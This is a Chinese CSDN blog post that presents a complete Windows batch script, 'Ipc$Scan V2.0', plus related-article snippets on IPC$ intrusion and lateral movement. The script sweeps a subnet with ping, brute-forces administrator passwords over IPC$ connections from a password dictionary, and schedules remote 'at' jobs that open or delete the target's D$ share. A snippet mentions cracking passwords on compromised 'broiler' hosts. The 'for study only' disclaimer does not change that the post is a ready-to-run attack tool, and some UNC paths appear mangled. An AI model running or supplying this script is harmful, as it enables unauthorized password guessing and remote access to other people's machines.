用批处理写的一个Ipc$扫描器

最新推荐文章于 2023-07-10 16:35:32 发布
最新推荐文章于 2023-07-10 16:35:32 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: 网络安全 文章标签: website menu user c email blog

用批处理写的一个Ipc$扫描器(Ipc$Scan V2.0.bat),仅供学习!

@ECHO OFF
setlocal
title Ipc$Scan V2.0
:::::::::::::::::::::::::::主菜单:::::::::::::::::::::::
:MENU
COLOR 8A
set op=""
CLS
rem echo.输出空行,即相当于输入一个回车
ECHO.
ECHO.
ECHO.
ECHO.                    "Ipc$Scan V2.0"欢迎您的使用!
ECHO.                                CODE BY t0nsha@070324
ECHO.           主菜单:
ECHO.          【1】Ping探测一个C类网段;
ECHO.          【2】Net Use猜解主机密码建立IPC$连接;
ECHO.          【3】At尝试开启目标共享(与2连用);
ECHO.          【4】At关闭目标共享(与2连用);
ECHO.          【About】关于此程序;
ECHO.          【Quit】退出。
ECHO.
set /p op=请选择服务项目的数字号并回车[1234]:
if %op%=="" goto error
rem 第一个选项具有默认选项的功能!
if %op%==1 goto op1
if %op%==2 goto op2
if %op%==3 goto op3
if %op%==4 goto op4
if "%op%"=="a" goto about
if "%op%"=="q" goto quit

:op1
set /p netid=请输入一个C类网段(如:192.168.1):
echo %netid%网段的主机存活情况如下:>alive.txt
for /L %%A in (1,1,254) do call :ping %netid% %%A
:ping
(ping -n 1 %1.%2 | find "from")&&echo %1.%2 >>alive.txt
if %2==5 cls & type alive.txt & pause & goto :menu

:op2
if not exist "pass.txt" goto :nopass
if exist "pass.txt" goto :nocreate
:nopass
echo 当前目录下没有密码文件(pass.txt),
set /p createpass=是否建立默认密码文件(YN):
if %createpass%==Y goto :create
if %createpass%==N goto :nocreate
:create
echo ;密码字典,每行前带分号的为注释行!>pass.txt
echo ;空密码为两个引号,即:"">>pass.txt
echo ;带空格的密码必须用双引号括起来,如:"test test">>pass.txt
echo "">>pass.txt
:nocreate
set /p ip=请输入一个IP地址(如:192.168.1.1):
set user="administrator"
set /p user=请输入尝试猜解的用户名(默认为Administrator):
for /F %%B in    (pass.txt) do call :netuse %ip% %%B %user%
:netuse
(net use /%1ipc$ %2 /user:%3 | find "成功")&&echo 主机%1上%user%的密码是:%2,已成功与%1建立连接!&pause&goto :menu

:op3
echo 此项应与第二项配对使用,即先用2建立连接后再运行本项!
net time /%ip%
::for /F "eol=; tokens=4,5 delims=: " %C in ('net time ^^’.25.90.5') do echo %C %D
for /F "eol=; tokens=4,5 delims=: " %%C in ('net time ^^%ip%') do Call :settime %%C %%D
:settime
set hour=%1 & set min=%2
::at /222.25.90.5 20:43 net share d$=d:
set/a newmin=%min%+2
::echo %hour:~0,2%:%newmin%
at /%ip% %hour:~0,2%:%newmin% net share d$=d:|find "成功"&&echo 主机%ip%将在%hour:~0,2%:%newmin%开启D盘共享!&&pause&&goto :menu
echo 失败!&pause&goto :menu

:op4
echo 此项应与第二项配对使用,即先用2建立连接后再运行本项!
net time /%ip%
::for /F "eol=; tokens=4,5 delims=: " %C in ('net time ^^’.25.90.5') do echo %C %D
for /F "eol=; tokens=4,5 delims=: " %%C in ('net time ^^%ip%') do Call :settime %%C %%D
:settime
set hour=%1 & set min=%2
::at /222.25.90.5 20:43 net share d$=d:
set/a newmin=%min%+2
::echo %hour:~0,2%:%newmin%
at /%ip% %hour:~0,2%:%newmin% net share d$ /del|find "成功"&&net use /%ip%ipc$ /del && echo 主机%ip%将在%hour:~0,2%:%newmin%关闭D盘共享!&&pause&&goto :menu
echo 失败!&pause&goto :menu

:about
cls
echo.
echo         ★★★★★★★★★★★★★★★★★★★★★★★★★★★
echo         ★                        关于                      ★
echo.        ★                                                  ★
echo         ★如有任何建议或Bug请Email至:liaodunxia@gmail.com  ★
echo.        ★                                                  ★
echo         ★                                                  ★
echo         ★               ◎退出请直接关闭窗口◎             ★
echo         ★★★★★★★★★★★★★★★★★★★★★★★★★★★
echo.
call :website
:website
setlocal enabledelayedexpansion
set website=          欢迎访问我的博客:http://blog.csdn.net/t0nsha的BLOG
:website2
for /l %%i in (0,1,45) do call :website1 %%i
if %a% equ 45 goto :about
goto :website2
:website1
set/a a=%1
set/p=!website:~%a%,1!<nul
ping/n 1 127.1>nul
goto :eof

:quit
cls
echo.
echo.
echo.
echo                ----------
echo                §谢谢使用!再见!§
echo                ----------
echo on & endlocal & ping -n 1 127.1 >nul & goto :eof

本文来自CSDN博客,转载请标明出处:http://blog.csdn.net/t0nsha/archive/2007/03/24/1540212.aspx

hack8
关注
专栏目录
批处理一个Ipc$扫描器Ipc$Scan V2.0.bat)
t0nsha's Blog
03-24 7740
 用批处理一个Ipc$扫描器Ipc$Scan V2.0.bat),仅供学习! @ECHO OFFsetlocaltitle Ipc$Scan V2.0:::::::::::::::::::::::::::主菜单::::::::::::::::::::::::MENUCOLOR 8Aset op=""CLSrem echo.输出空行,即相当于输入一个回车ECHO.ECHO.ECHO
Windows 远程控制(经典IPC$入侵、psexec类工具、利用WMI远程入侵、PsRemoting远程命令执行、使用wmic命令远程执行)
LKmnbZ's Blog
01-14 6973
一、经典IPC$入侵 利用ipc$和默认共享入侵远程电脑的过程 1. C:\>net use \\127.0.0.1\IPC$ "密码" /user:"用户名" 一般通过扫描弱口令来得到管理员帐号和密码 2. C:\> copy srv.exe \\127.0.0.1\admin$ 先复制srv.exe上去(这里的$是指admin用户的c:\winnt\system32...
一个批处理:IPC$ Password Crack---BAT
weixin_34122548的博客
09-21 228
有时候在肉鸡下面想整个其他的肉鸡,用SOCK5反向代理,麻烦又慢,有N多线程的IPC$密码破解工具,无奈别人装着杀软哇,做个免杀忒麻烦,大可不必动用牛刀,直接上个批处理脚本,如果被杀了是你人品问题,哈哈: ====================IPCPASSWORDCRACK.BAT================================== @echo o...
IPC$利用工具批处理
09-17
@echo off cls color b title Scaning By SYN 冷雨夜** %1-%2 ** %3 s.exe syn %1 %2 445 /save for /f "eol=- tokens=1 delims= " %%i in (result.txt) do echo %%i>>1.txt del Result.txt /q for /f "eol=P tokens=1 delims= " %%i in (1.txt) do echo %%i>>2.txt del 1.txt /q for /f "eol=S tokens=1 delims= " %%i in (2.txt) do echo %%i>>1433.txt del 2.txt /q if not exist 1433.txt echo no ip。&& goto:1 if exist 1433.txt echo %1 %2 %3>>有效ip记录.TXT @echo off mode con cols=40 lines=25&color 4a title 冷雨夜1433 echo. cmd.exe /c Taskkill /f /im scansql.exe @echo off&setlocal enabledelayedexpansion for /f "tokens=1,2,3 delims= " %%i in (1433.txt) do (
全自动IPC扫描器
11-23
全自动IPC扫描器,可以透过部分没有配置完整的防火墙,能够探测流光探测不到的一些用户
BAT命令 ipc$
smile_dyf的专栏
05-13 1912
ipc$  即  空连接  。 使用命令 net use url=file://\\IP\ipc$\\IP\ipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。 目录 1基本简介 ▪ 功能   ▪ 其他   2空会话 ▪ 建立   ▪ 应用   3关于操作 ▪ 所用端口   ▪
Windows server 2003操作系统的防护技巧,禁止IPC$空连接
最新发布
驰网飞飞的博客
07-10 490
多年以来,微软一直在强调建议重命名Administrator账号并禁用Guest账号,提高计算机的安全性。Windows Server 2003系统,Guest 账号是默认禁用的,管理员账号默认是Administrator,修改用户名和定期修改密码,飞飞认为是非常必要的,入侵者暴力破解都是从管理员账号开始。
内网安全之横向移动(冰蝎&&msf&&IPC$)
hack0919的博客
04-21 911
冰蝎相较其它Webshell管理工具,具备如下优点:支持跨平台运行、多采用加密传输、版本更新频繁等。
实验2 扫描器X-SCANNER应用实验
weixin_51063573的博客
04-02 1119
实验2 扫描器X-SCANNER应用实验 一、实验目的: 1.掌握网络端口扫描器的使用方法,熟悉常见端口和其对应的服务程序,掌握发现系统漏洞的方法。 2.掌握综合扫描及安全评估工具的使用方法,了解进行简单系统漏洞入侵的方法,了解常见的网络和系统漏洞以及其安全防护方法。 二、实验环境: 1.实验室所有机器安装了Windows操作系统,并组成了一个局域网,并且都安装了SuperScan端口扫描工具和流光Fluxay5综合扫描工具。 2.每两个学生为一组:互相进行端口扫描和综合扫描实验。 三、实验内容: (出主
批处理大观 IPC$入侵bat telnetbat 开机后台运行 等
06-14
批处理大观 IPC$入侵bat telnetbat 开机后台运行 等 包含全套批处理脚本,实用功能强大
红尘网安Ipc$【135】全自动扫描【网吧内网专用版】
12-25
红尘网安Ipc$【135】全自动扫描【网吧内网专用版】
IPC搜索工具
05-23
II 前 言 版本说明 本手册对应版本 V1R4B3 读者对象 监控中心管理人员、操作人员监控平台维护人员 阅读说明 本手册主要介绍以超级管理员身份登录监控中心 CU 客户端可...
ipcscan扫描网络
02-23
ipcscan扫描网络,简单的工具。ipcscan扫描网络。ipcscan扫描网络
IPC扫描和IPC漏洞的防范
weixin_34417200的博客
05-20 269
IPC$(InternetProcessConnection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。简单点说就是通过你的系统帐号和密码...
网页木马扫描器(文件批处理工具)
weixin_30929195的博客
03-23 155
用dotnet一个小工具,多文件处理工具。Download Demo! Download!!! Source Code 可以清除网页的木马! 可以多文件编码转换 转载于:https://www.cnblogs.com/xingquan/archive/2011/03/23/webscan.html...
批处理 内部命令 简明教程 3
chy2z的专栏
04-25 173
April 29, 2005ipc$常见问题 [转贴]1,怎样建立空连接,它有什么用?答:使用命令 net use $">\\IP\ipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需
【内网安全-横向移动】IPC$连接--->计划任务--->上线
02-07 8893
【横向移动-IPC$连接】at&schtasks创建定时任务上线
渗透测试基础入门【01】——测试流程(IPC$)
weixin_45565886的博客
01-17 1028
渗透测试基础— — 测试流程及IPC$入侵方式
IPC$入侵攻略
河北正定欢迎您-少占鱼
10-23 1177
一份详尽的IPC$入侵资料利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认
揭示IPC$与Telnet入侵风险及防御策略
另一方面,Telnet是一个标准的远程登录协议,允许用户通过网络连接到远程服务器,执行命令或进行远程管理。虽然它是管理员常用的工具,但它也为黑客提供了可乘之机,一旦 Telnet连接建立,攻击者能够操控目标计算机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值